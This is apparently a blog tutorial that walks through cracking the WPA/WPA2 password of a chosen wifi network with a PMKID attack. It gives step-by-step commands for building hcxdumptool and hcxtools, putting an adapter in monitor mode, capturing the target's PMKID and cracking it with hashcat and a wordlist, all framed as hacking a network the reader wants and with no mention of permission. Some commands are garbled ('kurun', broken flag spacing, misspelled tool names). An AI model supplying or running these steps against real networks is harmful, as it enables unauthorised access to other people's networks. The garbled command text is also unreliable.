HOW TO HACK WIFI PASSWORD (WPA / WPA2) USING PMKID ATTACK
You need to have;
1. Wifi adapter with Monitor mode and Packet Injection
2. High capacity computer
3. Kali linux
STEPS TO FOLLOW
1. The first step
download and install hcxdumptool and hcxtool for these kurun commands (this is for root user)
cd; git clone https://github.com/ZerBea/hcxdumptool; git clone https://github.com/ZerBea/hcxtools; cd hcxdumptool; make; make install; cd; cd hcxtools; make; make install; cd
2. The second step:
Put your wifi adapter in monitor mode by kurun this command
airmon-ng start wlanX
WlanX is the name of your wifi interface, knowing the name of the ifconfig interface run command. After you put it in monitor mode the interface of your wifi will change to something like wlanXmon
3.capture the PMKID of the wifi you want for this kurun command
echo BSSID> targetBSSID
In BSSID you will change and type the BSSID wifi you want to hack. Get a list of BSSID run airdump-ng wlanXmon .Then enter this command
hcxdumptool -i wlanXmon -o output
--enable_status = 1 --filterlist_ap = targetBSSID --filtermode = 2
Change wlanXmon by setting your wifi interface name in monitor mode.
It will take several minutes to capture PMKID
4. Step 4; convert Hash into a format that will be understood by hashcat by using this command
hcxcaptool -z hashoutput.txt output
5. Step 5; Crack hashes using hashcat for this command
hashcat -m 16800 hashoutput.txt -a 0 --kernel-accel = 1 -w 4 --force 'topwifipass.txt'
we have used the wordlist of topwifipass.txt you can customize and use the wordlist you want according to your needs. Wait for it to finish cracking and you will finally get the cracked password
In the next tutorial we will show you how to hack wifi password using wifi phishing attack
. + 255785078502
Subscribe your email address now to get the latest articles from us
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment